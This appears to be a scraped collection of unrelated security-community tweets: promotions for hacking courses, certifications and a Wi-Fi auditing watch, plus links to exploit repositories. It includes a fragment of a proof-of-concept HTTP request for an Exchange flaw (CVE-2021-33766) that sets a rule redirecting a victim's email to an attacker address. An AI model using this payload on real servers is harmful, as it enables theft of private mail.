🧵
1/ Two days ago I shared this image to demonstrate how many unique paths exist for a single behavior. At the time I didn't know how to use it, but today I realized it shows why red teams, MITRE evals, & vendor tests can't answer Technique coverage questions without change.
MS Exchange Server Email Snooping (CVE-2021-33766)
PoC to handle victim's email box
POST /ecp/victim@victim/RulesEditor/InboxRules.svc/NewObject?msExchEcpCanary=b0o0
...
Cookie: SecurityToken=x
...
{"properties":{"Redirecto":..."attacker@attacker"
https://t.co/A7ja28klay
iOS 14.0 "remote jailbreak" demo.😎 (RCE + LPE exploit)
Don't stay on versions on or below iOS 14.3. If you click a malicious link, bad guys would steal everything on your iPhone.
So, you can upload a file to the web app..
Bonus! Repo with slightly old exploits for image upload:
https://t.co/jbYQ15tgV1
XMind source:
https://t.co/oiclQ9Ycoz
Thanks to hacktricks and @HolyBugx for new tricks (at least for us)
https://t.co/JpCBW2AQ3J
https://t.co/B4q6sAnJ4K
Epic @AppSecNZ *online* training line up!
Learn to hack Web🕸️ Desktop💻 Mobile📱 apps
#Nodejs Electron #Android#iOS
💯hands-on, all action & no fluff!
Lifetime Access, recording & updates for free
Registration closes in a few days!
https://t.co/qvTdPo2SaC
I waited 2 years for this, rewrote impacket for this, asked cryptographers to remake algos in python for this, spent enormous time of my life to make this happen. and it's finally here this finally works and I can't find the words to express my satisfaction.
do you want the BEST hacking certification? I just entered to win an OSCP bundle from @offsectraining and @networkchuck ENTER HERE: https://t.co/qeElgQvseA
8 more days to our HITB cyberweek lab session. Join our lab, If you want to learn how does IDA Pro able to perform instrumentation with the help of Qiling Framework.
Signup now with FREE code "ILOVEQILING". limited seats!
https://t.co/qEeyamlatg
YouTube took down Zaid Sabih’s channel because of its educational ethical hacking content. Let @YouTube know that was a mistake. RETWEET and spread the word.
@thecybermentor@NullByte@stokfredrik
"James Bond" watch for Wi-Fi Hackers - https://t.co/O4pBEY08TS Load custom code and audit Wi-Fi networks :-)
Our BH Asia 2017 release (compatible with ESP32 on this watch) https://t.co/FUARreAmfe [pics from the website]